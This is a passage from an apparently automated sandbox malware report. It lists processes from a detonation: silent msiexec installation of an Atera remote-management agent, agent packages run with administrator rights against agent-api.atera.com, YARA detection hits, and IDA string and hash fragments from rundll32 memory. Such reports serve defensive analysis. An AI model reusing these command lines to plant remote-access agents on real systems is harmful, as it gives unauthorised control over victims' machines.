                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844DE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844E6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x2139a630000
                                                                                                                                                                                                                                        File size:55'856 bytes
                                                                                                                                                                                                                                        MD5 hash:E32856BEF4126DF5FB008E0EC9E7A3DD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:11:20:27
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1cc122b0000
                                                                                                                                                                                                                                        File size:219'696 bytes
                                                                                                                                                                                                                                        MD5 hash:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:11:20:27
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:11:20:27
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                                                                                                                                                                                                                        Imagebase:0x7ff65d820000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:11:20:28
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x165977f0000
                                                                                                                                                                                                                                        File size:37'936 bytes
                                                                                                                                                                                                                                        MD5 hash:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                        Start time:11:20:28
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:11:20:29
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000
                                                                                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:11:20:30
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x13261b10000
                                                                                                                                                                                                                                        File size:396'336 bytes
                                                                                                                                                                                                                                        MD5 hash:B50005A1A62AFA85240D1F65165856EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$Items$rer<System.Object>.Equals$ructor
                                                                                                                                                                                                                                          • API String ID: 0-1247952544
                                                                                                                                                                                                                                          • Opcode ID: 59909727c3b9f6b197194f689bdbad5d68966ae3dd5de6a46e089b6b6d4f6ecc
                                                                                                                                                                                                                                          • Instruction ID: f699b13b0678677921b11e061572bf9df008e18c5042e9455cd9a26766fde820
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59909727c3b9f6b197194f689bdbad5d68966ae3dd5de6a46e089b6b6d4f6ecc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B71D831F00218DFEB149BB5DC54BAEB6E7AFC8204F189069E606EB390DE74EC129740
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$ructor$t_ProcessExtensionDataNames${0}.
                                                                                                                                                                                                                                          • API String ID: 0-496294683
                                                                                                                                                                                                                                          • Opcode ID: 5e915996b0e2aa7a8d1336285e0438449a256841d015ab059159d0ae0f75d627
                                                                                                                                                                                                                                          • Instruction ID: eb76c84093e09bde7353c2dc226f62323ecd4ef04158cbc05bcec6867e7bb74c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e915996b0e2aa7a8d1336285e0438449a256841d015ab059159d0ae0f75d627
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9251B535B04248EFEB08DB64E8747AE7BB6EFC9314F144429D606E7381DE796C068791
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$aScriptUtils$ructor$zingCallbacks
                                                                                                                                                                                                                                          • API String ID: 0-790695898
                                                                                                                                                                                                                                          • Opcode ID: d6076c0f4378483cb7ed48de6435770f7101bbcc294887e8b8bec9e3d2561e66
                                                                                                                                                                                                                                          • Instruction ID: 739ccadb96b3e62433213b266c33e2bfda53fc95992b6f91e7e09f44e99a46a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6076c0f4378483cb7ed48de6435770f7101bbcc294887e8b8bec9e3d2561e66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E313B21B083440FFB296B356C6437E3BA7CFC2258F0894BACB41CB386DE69AC464355
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Items$rer<System.Object>.Equals
                                                                                                                                                                                                                                          • API String ID: 0-2618918241
                                                                                                                                                                                                                                          • Opcode ID: f91cdb378b8595a067dd32e0450506e8902a2d52e16df50dcd60c8fdef74f5a4
                                                                                                                                                                                                                                          • Instruction ID: 6cb8fd1d3ab555c29e26a2bef5cff056ec02729bf588d46e92336026f1d5a189
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f91cdb378b8595a067dd32e0450506e8902a2d52e16df50dcd60c8fdef74f5a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A511535B05215CFDB14CF68D890A6ABBB5FF45318B2581E9D618CB362DB72EC42C781
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $q$$q
                                                                                                                                                                                                                                          • API String ID: 0-3126353813
                                                                                                                                                                                                                                          • Opcode ID: 89d7a3bd3216650a60b857e7bea37c98b2f036d4b60b0eead56f6dd5ce166f12
                                                                                                                                                                                                                                          • Instruction ID: 9a53b610e60bfcd40ef62ab9bfdcfdf1dbb25742d6ee967b178086acb3ffd0a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89d7a3bd3216650a60b857e7bea37c98b2f036d4b60b0eead56f6dd5ce166f12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC51CF35B012089FDB15DF79D8506AEBBA6BFC9350B14816AE619DB390DA30AD02CB90
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: aScriptUtils$ructor
                                                                                                                                                                                                                                          • String ID: convert to integer: {0}.$ructor
                                                                                                                                                                                                                                          • rer<System.Object>.Equals, xrefs: 04EF10E2
                                                                                                                                                                                                                                          • String ID: rer<System.Object>.Equals
                                                                                                                                                                                                                                          • String ID: osition {1}
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • String ID: {0}.
                                                                                                                                                                                                                                          • String ID: UniversalTicks
                                                                                                                                                                                                                                          • API String ID: 0-854640773
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • API String ID: 0-4104394713
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • ystem.Collections.Generic.IEqualityComparer<System.Object>.Equals, xrefs: 04EF2654
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ystem.Collections.Generic.IEqualityComparer<System.Object>.Equals
                                                                                                                                                                                                                                          • API String ID: 0-3131439544
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: rializingCallbacks
                                                                                                                                                                                                                                          • API String ID: 0-2731976878
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • ter cannot read JSON with the specified existing value. {0} is required., xrefs: 04EF0E7C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ter cannot read JSON with the specified existing value. {0} is required.
                                                                                                                                                                                                                                          • API String ID: 0-2883852908
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1311915560.0000000004B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B6D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_4b6d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 36b4f40014c6eca37451da60e295b92c2218aa0235af3edf8fdc79d78df084c7
                                                                                                                                                                                                                                          • Instruction ID: 404ee5cd79fcc581774ae403d996e2a2facf09650bd7f04cd08cf032ab9b6e2c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36b4f40014c6eca37451da60e295b92c2218aa0235af3edf8fdc79d78df084c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D015E7150D3C09FE7124B259C94752BFA8DF43224F1981DBE9898F1A3D26DAC49CB72
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1311915560.0000000004B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B6D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_4b6d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ae87e57afa24edf6aeb65efa56ec82ff4322c3e0fd1a1a6d0cbbfeb645370c4c
                                                                                                                                                                                                                                          • Instruction ID: 293ce1b91d8edb41abf467d1caf17a94177acd865992f778c5330bb743c2c483
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae87e57afa24edf6aeb65efa56ec82ff4322c3e0fd1a1a6d0cbbfeb645370c4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D01F7717083409EE7204E35EC84B67BF8CDF41325F18C1AADC4A0F182D27CA845CAB5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d5318ae974d347806596da8efd5f7cb88286bc42d75b934af1bc6e2ba8d475e4
                                                                                                                                                                                                                                          • Instruction ID: ed18fd17eebb55c019aad7169ec070ae476a57ef264589118b78a242cc6fa8dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5318ae974d347806596da8efd5f7cb88286bc42d75b934af1bc6e2ba8d475e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF059367097014BE7395E26BCC02BD775BEFD439874890AADB48C7296DF299C069290
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3ed2d5d4aa6e01323e634dd48732b3ca48fb98126b82f496778af6e86468ca07
                                                                                                                                                                                                                                          • Instruction ID: d0f5077846c37b5c76f4afb222b3d13a75a5ec0e1cce3a7aa514a91b42c3041a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed2d5d4aa6e01323e634dd48732b3ca48fb98126b82f496778af6e86468ca07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF0E932F241048BEB4C9569E0541ED7777DBC9351B69912AD903A7384DF256D1EC740
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a36e548be2a0835a629bb62ea4069bd8980337b491b213352c084f788ccbfa9
                                                                                                                                                                                                                                          • Instruction ID: f5edde491ba15565916c326e3e427896b20cdaca4040f5ee661c06c7210d9318
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a36e548be2a0835a629bb62ea4069bd8980337b491b213352c084f788ccbfa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19F09E3AB043448BD7281A169890319AB0A6BD42B8F0950BDCF04CB302EE249C018290
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f56819e7f785908e536c428b12f9514c0ab01a0ac40d63c9adfcc4f9e59cca09
                                                                                                                                                                                                                                          • Instruction ID: 036391a9cedc4e3ca7e6f332ea9ef1f6093cd060f474dc23d2ee5244c3aebfbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f56819e7f785908e536c428b12f9514c0ab01a0ac40d63c9adfcc4f9e59cca09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E0E536F101589BCB089668E4645EDBBBAEBC8211B118136D912A7340EF756D1DC790
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 77c826302b7d72fc5d2a8c096bf4791f08e00a63debd42f2da8b0a6ee3536d36
                                                                                                                                                                                                                                          • Instruction ID: dc3109d21500fd3e748c37c6dc24944c8e5ca20280e97cf402b26910d1ff44a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c826302b7d72fc5d2a8c096bf4791f08e00a63debd42f2da8b0a6ee3536d36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E02B35648349CFD7159F25D875329BB68BF01208B259CCAD649CB203E925EC95C741
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 578e57e5fb07b48338cd62144e6026e9feeaa63d7bb57f5da23971ad647563d9
